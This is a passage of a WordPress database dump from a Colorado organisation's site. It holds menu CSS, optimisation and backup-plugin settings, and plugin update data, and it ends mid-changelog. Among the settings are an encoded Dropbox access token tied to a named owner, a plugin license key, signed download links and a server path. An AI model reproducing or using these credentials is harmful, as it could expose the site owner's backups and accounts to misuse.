#f1f1f1;\n  max-width: none;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu {\n    float: left;\n    position: static;\n    width: 100%;\n    padding: 0;\n    border: 0;\n  }\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item {\n    clear: both;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item a.mega-menu-link {\n  display: block;\n  background: #f1f1f1;\n  color: #666;\n  font-family: inherit;\n  font-size: 14px;\n  font-weight: normal;\n  padding: 0px 10px 0px 10px;\n  line-height: 35px;\n  text-decoration: none;\n  text-transform: none;\n  vertical-align: baseline;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item:first-child > a.mega-menu-link {\n  border-top-left-radius: 0px;\n  border-top-right-radius: 0px;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item:first-child > a.mega-menu-link {\n    border-top-left-radius: 0;\n    border-top-right-radius: 0;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item:last-child > a.mega-menu-link {\n  border-bottom-right-radius: 0px;\n  border-bottom-left-radius: 0px;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item:last-child > a.mega-menu-link {\n    border-bottom-right-radius: 0;\n    border-bottom-left-radius: 0;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item a.mega-menu-link:focus {\n  background: #ddd;\n  font-weight: normal;\n  text-decoration: none;\n  color: #666;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item ul.mega-sub-menu {\n  position: absolute;\n  left: 100%;\n  top: 0;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item ul.mega-sub-menu {\n    position: static;\n    left: 0;\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu li.mega-menu-item ul.mega-sub-menu a.mega-menu-link {\n    padding-left: 20px;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after {\n  content: \'\\f140\';\n  font-family: dashicons;\n  font-weight: normal;\n  display: inline-block;\n  margin: 0 0 0 6px;\n  vertical-align: top;\n  -webkit-font-smoothing: antialiased;\n  -moz-osx-font-smoothing: grayscale;\n  transform: rotate(0);\n  color: inherit;\n  position: relative;\n  background: transparent;\n  height: auto;\n  width: auto;\n  right: auto;\n  line-height: inherit;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n  display: inline-block;\n  height: 100%;\n  width: auto;\n  background: transparent;\n  position: relative;\n  pointer-events: auto;\n  left: auto;\n  min-width: auto;\n  line-height: inherit;\n  color: inherit;\n  font-size: inherit;\n  padding: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n  float: right;\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children.mega-collapse-children.mega-toggle-on > a.mega-menu-link > span.mega-indicator:after {\n  content: \'\\f142\';\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n    float: right;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children.mega-toggle-on > a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f142\';\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children.mega-hide-sub-menu-on-mobile > a.mega-menu-link > span.mega-indicator {\n    display: none;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu:not(.mega-menu-tabbed) li.mega-menu-item-has-children:not(.mega-collapse-children) > a.mega-menu-link > span.mega-indicator, #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-item-has-children.mega-hide-arrow > a.mega-menu-link > span.mega-indicator {\n  display: none;\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout li.mega-menu-item a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f139\';\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout.mega-align-bottom-right li.mega-menu-item a.mega-menu-link {\n    text-align: right;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout.mega-align-bottom-right li.mega-menu-item a.mega-menu-link > span.mega-indicator {\n    float: left;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout.mega-align-bottom-right li.mega-menu-item a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f141\';\n    margin: 0 6px 0 0;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout.mega-align-bottom-right li.mega-menu-item a.mega-menu-link:before {\n    float: right;\n    margin: 0 0 0 6px;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-flyout.mega-align-bottom-right ul.mega-sub-menu li.mega-menu-item ul.mega-sub-menu {\n    left: -100%;\n    top: 0;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-right.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator, #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-right.mega-menu-flyout li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n    float: right;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-right.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after, #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-right.mega-menu-flyout li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f139\';\n    margin: 0;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-left.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator, #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-left.mega-menu-flyout li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n    float: left;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-left.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after, #mega-menu-wrap-primary #mega-menu-primary.mega-menu-vertical li.mega-align-bottom-left.mega-menu-flyout li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f141\';\n    margin: 0;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-accordion > li.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator {\n    float: right;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary.mega-menu-accordion li.mega-menu-item-has-children.mega-toggle-on > a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f142\';\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-tabbed > ul.mega-sub-menu > li.mega-menu-item.mega-menu-item-has-children > a.mega-menu-link > span.mega-indicator:after {\n    content: \'\\f139\';\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li[class^=\'mega-lang-item\'] > a.mega-menu-link > img {\n  display: inline;\n}\n#mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link > img.wpml-ls-flag, #mega-menu-wrap-primary #mega-menu-primary a.mega-menu-link > img.iclflag {\n  display: inline;\n  margin-right: 8px;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-hide-on-mobile, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-hide-on-mobile, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item.mega-hide-on-mobile {\n    display: none;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-hide-on-desktop, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-hide-on-desktop, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item.mega-hide-on-desktop {\n    display: none;\n  }\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary:after {\n    content: \"\";\n    display: table;\n    clear: both;\n  }\n}\n#mega-menu-wrap-primary .mega-menu-toggle {\n  display: none;\n  z-index: 1;\n  cursor: pointer;\n  background: #222;\n  border-radius: 2px 2px 2px 2px;\n  line-height: 40px;\n  height: 40px;\n  text-align: left;\n  -webkit-touch-callout: none;\n  -webkit-user-select: none;\n  -khtml-user-select: none;\n  -moz-user-select: none;\n  -ms-user-select: none;\n  -webkit-tap-highlight-color: transparent;\n  outline: none;\n  white-space: nowrap;\n}\n#mega-menu-wrap-primary .mega-menu-toggle img {\n  max-width: 100%;\n  padding: 0;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary .mega-menu-toggle {\n    display: -webkit-box;\n    display: -ms-flexbox;\n    display: -webkit-flex;\n    display: flex;\n  }\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-left, #mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-center, #mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-right {\n  display: -webkit-box;\n  display: -ms-flexbox;\n  display: -webkit-flex;\n  display: flex;\n  -ms-flex-preferred-size: 33.33%;\n  -webkit-flex-basis: 33.33%;\n  flex-basis: 33.33%;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-left {\n  -webkit-box-flex: 1;\n  -ms-flex: 1;\n  -webkit-flex: 1;\n  flex: 1;\n  -webkit-box-pack: start;\n  -ms-flex-pack: start;\n  -webkit-justify-content: flex-start;\n  justify-content: flex-start;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-left .mega-toggle-block {\n  margin-left: 6px;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-center {\n  -webkit-box-pack: center;\n  -ms-flex-pack: center;\n  -webkit-justify-content: center;\n  justify-content: center;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-center .mega-toggle-block {\n  margin-left: 3px;\n  margin-right: 3px;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-right {\n  -webkit-box-flex: 1;\n  -ms-flex: 1;\n  -webkit-flex: 1;\n  flex: 1;\n  -webkit-box-pack: end;\n  -ms-flex-pack: end;\n  -webkit-justify-content: flex-end;\n  justify-content: flex-end;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-blocks-right .mega-toggle-block {\n  margin-right: 6px;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block {\n  display: -webkit-box;\n  display: -ms-flexbox;\n  display: -webkit-flex;\n  display: flex;\n  height: 100%;\n  outline: 0;\n  -webkit-align-self: center;\n  -ms-flex-item-align: center;\n  align-self: center;\n  -ms-flex-negative: 0;\n  -webkit-flex-shrink: 0;\n  flex-shrink: 0;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary .mega-menu-toggle + #mega-menu-primary {\n    background: #222;\n    padding: 0px 0px 0px 0px;\n    display: none;\n  }\n  #mega-menu-wrap-primary .mega-menu-toggle.mega-menu-open + #mega-menu-primary {\n    display: block;\n  }\n}\n#mega-menu-wrap-primary .mega-menu-toggle {\n  /** Push menu onto new line **/\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block-1 {\n  cursor: pointer;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block-1:after {\n  content: \'\\f333\';\n  font-family: \'dashicons\';\n  font-size: 24px;\n  color: #ddd;\n  margin: 0 0 0 5px;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block-1 .mega-toggle-label {\n  color: #ddd;\n  font-size: 14px;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block-1 .mega-toggle-label .mega-toggle-label-open {\n  display: none;\n}\n#mega-menu-wrap-primary .mega-menu-toggle .mega-toggle-block-1 .mega-toggle-label .mega-toggle-label-closed {\n  display: inline;\n}\n#mega-menu-wrap-primary .mega-menu-toggle.mega-menu-open .mega-toggle-block-1:after {\n  content: \'\\f153\';\n}\n#mega-menu-wrap-primary .mega-menu-toggle.mega-menu-open .mega-toggle-block-1 .mega-toggle-label-open {\n  display: inline;\n}\n#mega-menu-wrap-primary .mega-menu-toggle.mega-menu-open .mega-toggle-block-1 .mega-toggle-label-closed {\n  display: none;\n}\n#mega-menu-wrap-primary {\n  clear: both;\n}\n','no'),(52046,'_transient_timeout_megamenu_css_version','4719142988','no'),(52047,'_transient_megamenu_css_version','2.7.1.4','no'),(52048,'_transient_timeout_megamenu_css_last_updated','4719142988','no'),(52049,'_transient_megamenu_css_last_updated','1565542988','no'),(53516,'wp-optimize-schedule','false','yes'),(53517,'wp-optimize-last-optimized','Never','yes'),(53518,'wp-optimize-schedule-type','wpo_weekly','yes'),(53519,'wp-optimize-retention-enabled','false','yes'),(53520,'wp-optimize-retention-period','2','yes'),(53521,'wp-optimize-enable-admin-menu','false','yes'),(53522,'wp-optimize-total-cleaned','0','yes'),(53523,'wp-optimize-auto','a:7:{s:8:\"optimize\";s:5:\"false\";s:6:\"drafts\";s:4:\"true\";s:5:\"spams\";s:4:\"true\";s:9:\"transient\";s:5:\"false\";s:9:\"revisions\";s:4:\"true\";s:10:\"unapproved\";s:5:\"false\";s:5:\"trash\";s:4:\"true\";}','yes'),(53524,'wp-optimize-settings','a:13:{s:15:\"user-trackbacks\";s:5:\"false\";s:13:\"user-optimize\";s:5:\"false\";s:13:\"user-postmeta\";s:5:\"false\";s:11:\"user-drafts\";s:4:\"true\";s:10:\"user-spams\";s:5:\"false\";s:16:\"user-commentmeta\";s:5:\"false\";s:14:\"user-pingbacks\";s:5:\"false\";s:14:\"user-transient\";s:5:\"false\";s:15:\"user-orphandata\";s:5:\"false\";s:14:\"user-revisions\";s:4:\"true\";s:15:\"user-unapproved\";s:5:\"false\";s:10:\"user-trash\";s:4:\"true\";s:13:\"last_saved_in\";s:6:\"3.0.15\";}','yes'),(53525,'updraft_task_manager_dbversion','1.1','yes'),(53534,'wp-optimize-corrupted-tables-count','0','yes'),(53535,'wp-optimize-compression_server','resmushit','yes'),(53536,'wp-optimize-image_quality','100','yes'),(53537,'wp-optimize-back_up_original','1','yes'),(53539,'wp-optimize-is_gzip_compression_enabled','gzip','yes'),(53558,'wpo_cache_config','a:24:{s:19:\"enable_page_caching\";b:0;s:23:\"page_cache_length_value\";i:24;s:22:\"page_cache_length_unit\";s:5:\"hours\";s:17:\"page_cache_length\";i:86400;s:32:\"cache_exception_conditional_tags\";a:0:{}s:20:\"cache_exception_urls\";a:0:{}s:23:\"cache_exception_cookies\";a:0:{}s:30:\"cache_exception_browser_agents\";a:0:{}s:22:\"enable_sitemap_preload\";b:0;s:23:\"enable_schedule_preload\";b:0;s:21:\"preload_schedule_type\";s:0:\"\";s:21:\"enable_mobile_caching\";b:0;s:19:\"enable_user_caching\";b:0;s:8:\"site_url\";s:30:\"https://eckankar-colorado.org/\";s:24:\"enable_cache_per_country\";b:0;s:19:\"permalink_structure\";s:12:\"/%postname%/\";s:7:\"uploads\";s:44:\"/home/eckank5/public_html/wp-content/uploads\";s:10:\"gmt_offset\";d:-6;s:15:\"timezone_string\";s:14:\"America/Denver\";s:11:\"date_format\";s:6:\"F j, Y\";s:11:\"time_format\";s:5:\"g:i a\";s:15:\"use_webp_images\";b:0;s:17:\"wpo_cache_cookies\";a:0:{}s:25:\"wpo_cache_query_variables\";a:0:{}}','yes'),(53562,'updraftplus_version','1.23.12','yes'),(53563,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-6ea4997c940685159db9e990971b3d2e\";a:3:{s:5:\"token\";s:0:\"\";s:5:\"email\";s:0:\"\";s:5:\"quota\";i:-1;}}}','yes'),(53564,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-2a887e7f61457cf95adaa834f8cd3423\";a:7:{s:6:\"appkey\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:472:\"2IvL52QJPbP5lwGmI70KnC457cFcnslYyIrTOTVbNdm67peOkCeayyPvOu1kwxX+NA37oiSdca3+RUZ6/ILNU5xci3kBbkTb1WoRpyumwLKMzE8nc5xTsRZc/cOL5NRm/oQ6z/G2sSMkcjOCQcSKl0cJ6+2mU+jL6+Y4eCXfCaRxdY7tj0oYWjT+RMFCRnKBdpvefSBNLRpE8GnyodhHryQXgGdy0euT3ieGuooHZi4quxv2106YyWnDlm/G7TlQjlwv/NVnu/HizCLF+4Sl5OXJ9+a9wGMvRwlZBvSNTVp4Ptcg6f37cGNlKjWlfEBfWEPm/am+ZGK+ok9+O9zEJbfH0yEOTnvXkwxQVaHuxi1uRSf7y0zjw5MkdTSNQk7KTSQT/O8Vj9N4IPNUQp8581T7TccYP68aTnNBLQnJoBHvGzqfgPIJHGmEJp8Tq5cH0PV6tjJzrXyHIAXHo2fKJA==\";s:9:\"ownername\";s:14:\"Chris Holliday\";s:4:\"CSRF\";s:0:\"\";s:16:\"instance_enabled\";i:1;}}}','yes'),(53565,'updraft_s3','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-9e24eb566c6734e95d0d4518b7d98716\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(53566,'updraft_cloudfiles','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-0b755ae2f2ea1ea75fac85a95947f9bd\";a:5:{s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:0:\"\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(53567,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-ac9408e6f90ac7f906ec54cb15881b27\";a:4:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"token\";s:0:\"\";s:6:\"folder\";s:11:\"UpdraftPlus\";}}}','yes'),(53568,'updraft_onedrive','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53569,'updraft_ftp','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-ea65aa0fd1821aff042ff1bc01e5b5cc\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}}}','yes'),(53570,'updraft_azure','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53571,'updraft_sftp','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53572,'updraft_googlecloud','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53573,'updraft_backblaze','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53574,'updraft_webdav','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(53575,'updraft_s3generic','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-8ee07395f07dec6a9bd4c5d03767f1af\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','yes'),(53576,'updraft_openstack','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-6c272acd932f8e891235e2798be7074a\";a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(53577,'updraft_dreamobjects','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-2b11b23825494d066d13028097ad6194\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:26:\"objects-us-east-1.dream.io\";}}}','yes'),(53579,'updraftplus-addons_siteid','0fb83cc76183cb33afec58a71a9b645e','no'),(53584,'updraftplus_tour_cancelled_on','settings_remote_storage','yes'),(53592,'updraft_retain_extrarules','a:0:{}','yes'),(53593,'updraft_email','webmaster@eckankar-colorado.org','yes'),(53594,'updraft_report_warningsonly','a:0:{}','yes'),(53595,'updraft_report_wholebackup','a:0:{}','yes'),(53596,'updraft_extradbs','a:0:{}','yes'),(53597,'updraft_include_more_path','a:0:{}','yes'),(53598,'updraft_interval','manual','yes'),(53599,'updraft_retain','5','yes'),(53600,'updraft_interval_database','manual','yes'),(53601,'updraft_retain_db','5','yes'),(53602,'updraft_service','dropbox','yes'),(53603,'updraft_include_plugins','1','yes'),(53604,'updraft_include_themes','1','yes'),(53605,'updraft_include_uploads','1','yes'),(53606,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone,snapshots','yes'),(53607,'updraft_include_others','1','yes'),(53608,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(53609,'updraft_split_every','400','yes'),(53610,'updraft_delete_local','1','yes'),(53611,'updraft_dir','updraft','yes'),(53612,'updraft_debug_mode','0','yes'),(53613,'updraft_ssl_useservercerts','0','yes'),(53614,'updraft_ssl_disableverify','0','yes'),(53615,'updraft_ssl_nossl','0','yes'),(53617,'updraft_lastmessage','Deleting old log file: log.a952c83a5d9c.txt (May 31 06:38:33)','yes'),(54249,'disable_comments_options','a:5:{s:19:\"disabled_post_types\";a:4:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:10:\"attachment\";i:3;s:12:\"tribe_events\";}s:17:\"remove_everywhere\";b:1;s:16:\"extra_post_types\";b:0;s:10:\"db_version\";i:7;s:17:\"sitewide_settings\";b:0;}','yes'),(54299,'rda_access_switch','manage_options','yes'),(54300,'rda_access_cap','manage_options','yes'),(54301,'rda_redirect_url','https://eckankar-colorado.org','yes'),(54302,'rda_enable_profile','','yes'),(54303,'rda_login_message','','yes'),(55150,'mediamatic_wpfolder_children','a:0:{}','yes'),(55151,'mediamatic_sidebar_width','242','yes'),(55241,'njt-filebird_splitter_width','240','yes'),(55248,'nt_wmc_folder_children','a:0:{}','yes'),(55315,'folders_show_in_menu','off','yes'),(55316,'folder_redirect_status','3','yes'),(55317,'folders_settings','a:1:{i:0;s:10:\"attachment\";}','yes'),(55328,'folders_settings1','a:1:{s:20:\"premio_folder_option\";s:3:\"yes\";}','yes'),(55335,'selected_media_folder_folder','','yes'),(55366,'wcp_dynamic_width_for_attachment','321','yes'),(55892,'wcp_folder_license_key','b303bf79497dbd970ef3cc37c73ab6e0','yes'),(56396,'edd_sl_67f2263936e374c476202d595d2f80fe','a:2:{s:7:\"timeout\";i:1700594884;s:5:\"value\";s:17246:\"{\"new_version\":\"2.9.9\",\"stable_version\":\"2.9.9\",\"name\":\"Folders\",\"slug\":\"folders\",\"url\":\"https:\\/\\/go.premio.io\\/downloads\\/folders\\/?changelog=1\",\"last_updated\":\"2023-11-21 07:28:54\",\"homepage\":\"https:\\/\\/go.premio.io\\/downloads\\/folders\\/\",\"package\":\"https:\\/\\/go.premio.io\\/edd-sl\\/package_download\\/MTcwMDY4MTI4NDpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6MGFkNmE4MzZmYWRhODM0ODYyMWQwYTVhMDFmMDVlMzE6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA==\",\"download_link\":\"https:\\/\\/go.premio.io\\/edd-sl\\/package_download\\/MTcwMDY4MTI4NDpiMzAzYmY3OTQ5N2RiZDk3MGVmM2NjMzdjNzNhYjZlMDo2ODc6MGFkNmE4MzZmYWRhODM0ODYyMWQwYTVhMDFmMDVlMzE6aHR0cHNALy9lY2thbmthci1jb2xvcmFkby5vcmc6MA==\",\"sections\":{\"description\":\"\",\"changelog\":\"<p>= 2.9.9 =<br \\/>\\nDB bug fixed<\\/p>\\n<p>= 2.9.8 =<br \\/>\\nThrive Themes bug fixed<\\/p>\\n<p>= 2.9.7 =<br \\/>\\nChanged shortcut for creating a new folder (Gutenberg conflict resolved)<\\/p>\\n<p>= 2.9.6 =<br \\/>\\nScroll bug fix<\\/p>\\n<p>= 2.9.5 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.8.8 =<br \\/>\\n- Infrastructure improvements - Folders works faster now<br \\/>\\n- Added Folders support for Plugins<br \\/>\\n- WooCommerce product support for Dynamic Folders<br \\/>\\n- Added support for LMS LearnPress plugin<br \\/>\\n- Bugs fixed<\\/p>\\n<p>= 2.8.7 =<br \\/>\\n- Media library files url bug fixed<br \\/>\\n- Notification background bug fixed<\\/p>\\n<p>= 2.8.6 =<br \\/>\\n- Folders user access management - advanced folders access management for your team with roles that restrict their access to view and edit your website\\u2019s folders (Pro feature)<br \\/>\\n- New folders will be added to the top of the folders list<br \\/>\\n- We\\u2019ve improved folders compatibility with the WPML plugin and MailPoet<br \\/>\\n- Fixed a notice for PHP 8.0<br \\/>\\n- BuddyBoss items count bug fixed<br \\/>\\n- WebP Express bug fixed<br \\/>\\n- Media replace works fine with SVG and WebP files now<br \\/>\\n- Download folder as a ZIP bug fixed for big folders<\\/p>\\n<p>= 2.8.5 =<br \\/>\\nFolders import bug fixed<\\/p>\\n<p>= 2.8.4 =<br \\/>\\n- We\'ve added a horizontal scroll to the folders view<br \\/>\\n- Importing folders works better and faster now, the same goes for uploading folders and media library scan for used files<br \\/>\\n- Published\\/Drafts view works for specific folders too<br \\/>\\n- Fixed some bugs<\\/p>\\n<p>= 2.8.3 =<br \\/>\\nTexts changed<\\/p>\\n<p>= 2.8.2 =<br \\/>\\nAdded a \\\"Size\\\" column to the Media Cleaning feature and fixed a keyboard shortcuts bug<\\/p>\\n<p>= 2.8.1 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.8 =<br \\/>\\nAdded the option to clean unused media library files<br \\/>\\nAdded keyboard shortcuts<br \\/>\\nWhen you activate your license key it\'ll be hidden, a great feature for agencies that don\'t want to expose their license key to customers<br \\/>\\nFixed some bugs :)<\\/p>\\n<p>= 2.7.8 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.7.7 =<br \\/>\\nDivi bug fixed<\\/p>\\n<p>= 2.7.6 =<br \\/>\\nPerformance improvements<\\/p>\\n<p>= 2.7.5 =<br \\/>\\nReplace media bugs fixed<\\/p>\\n<p>= 2.7.4 =<br \\/>\\nWordPress 5.8 compatibility<\\/p>\\n<p>= 2.7.3 =<br \\/>\\nWe\'ve added the following features:<\\/p>\\n<p>Action bar that\'ll help you cut\\/copy\\/paste folders.<br \\/>\\nUpload folders directly from your computer now and keep the same local structure of folders.<br \\/>\\nRecycle bin feature to the media library.<br \\/>\\nLock\\/unlock all folders with the click of a button.<br \\/>\\nFolders restrictions based on the user who created the folder.<\\/p>\\n<p>We\'ve also added some UI improvements to make the usability as smooth as possible.<\\/p>\\n<p>= 2.7.2 =<br \\/>\\nDynamic folders bug fixed<\\/p>\\n<p>= 2.7.1 =<br \\/>\\nDynamic folders, auto rename files feature, undo your last action, advanced media replace features, and fixed some bugs<\\/p>\\n<p>= 2.7 =<br \\/>\\nWe fixed the issue where metadata details on hover could not be disabled<\\/p>\\n<p>= 2.6.9 =<br \\/>\\nLock folders, on-hover data for media library files, more file-type support for the media replacement functionality, and somebug fixes<\\/p>\\n<p>= 2.6.8 =<br \\/>\\nList view folders bulk actions bug fixed<\\/p>\\n<p>= 2.6.7 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.6.6 =<br \\/>\\nBugs fixed + more import options<\\/p>\\n<p>= 2.6.5 =<br \\/>\\niPad bugs fixed<\\/p>\\n<p>= 2.6.4 =<br \\/>\\nReplace media feature, import option (FileBird, Enhanced Media Library, Wicked Folders, Real Media Library, and WP Media Folder), create multiple folders at once (comma separated), option to hide Folders settings from the main menu, bug fixed<\\/p>\\n<p>= 2.6.3 =<br \\/>\\nWordPress 5.6 compatibility + Visual composer overlapping bug fixed<\\/p>\\n<p>= 2.6.2 =<br \\/>\\nVarious bugs fixed<\\/p>\\n<p>= 2.6.1 =<br \\/>\\nGallery related bugs and items-counter issues were fixed<\\/p>\\n<p>= 2.6 =<br 